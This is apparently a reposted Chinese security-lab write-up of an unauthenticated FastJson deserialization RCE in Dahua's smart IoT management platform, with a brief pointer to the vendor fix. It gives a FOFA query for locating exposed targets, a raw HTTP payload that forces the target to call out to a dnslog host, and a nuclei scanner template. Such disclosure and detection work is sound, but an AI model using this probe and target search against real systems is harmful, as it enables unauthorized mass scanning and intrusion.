大华智能物联综合管理平台使用了存在漏洞的FastJson组件,未经身份验证的攻击者可利用 /evo-runs/v1.0/auths/sysusers/random接口发送恶意的序列化数据执行任意指令,造成代码执行。
简介
大华智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。
复现环境
FOFA:icon_hash="-1935899595"
漏洞复现
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/json;charset=utf-8Accept-Encoding: gzipConnection: close{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://ab95m6rn.dnslog.pw"}}""}
nuclei扫描器插件
id: dahua-znwl-random-fastjsoninfo:name: dahua-znwl-random-fastjsonauthor: dahua-znwl-random-fastjsonseverity: criticalhttp:- raw:- |POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0)Content-Type: application/json;charset=utf-8{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}}""},"b":{{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}:"x"},"c":{{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}:0,"d":Set[{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}],"e":Set[{"@type":"java.net.URL","val":"http://{{interactsh-url}}"},}matchers:- type: wordpart: interactsh_protocolwords:- "dns"
加固建议
目前已提供解决方案,请关注厂商主页更新:https://www.dahuatech.com/
-=[感·谢·阅·读]=-
关于我们
星网实验室成立(starnetlabs)于2021年10月,是智网安云(武汉)信息技术有限公司旗下安全研究院实验室之一,其成员主要来源于国内一线安全厂商或监管执法机构,多名成员取得CISSP,CISP,PMP,CISAW,PTE等国内网络安全圈行业认证证书,该实验室研究员多次参加国内和省内网络安全攻防比赛取得佳绩。实验室主要研究方向:网络安全攻防竞赛、最前沿的攻防技术,云计算安全、物联网安全等。形成一支结构合理、创新能力强的产学研队伍。星网实验室将持续沉淀前沿安全能力,面向产业输出业蓝军网络安全对抗工具、红队攻击武器平台、蜜网平台、大数据安全管理中心等产品,并持续开放各项核心能力,推动产业安全能力建设。护航各行业数字化变革,守护大数据时代的网络安全是星网实验室的使命。
大
佬
,
关
注
一
下
呗
!
原文始发于微信公众号(星网实验室):大华智能物联综合管理平台fastjson远程代码执行漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论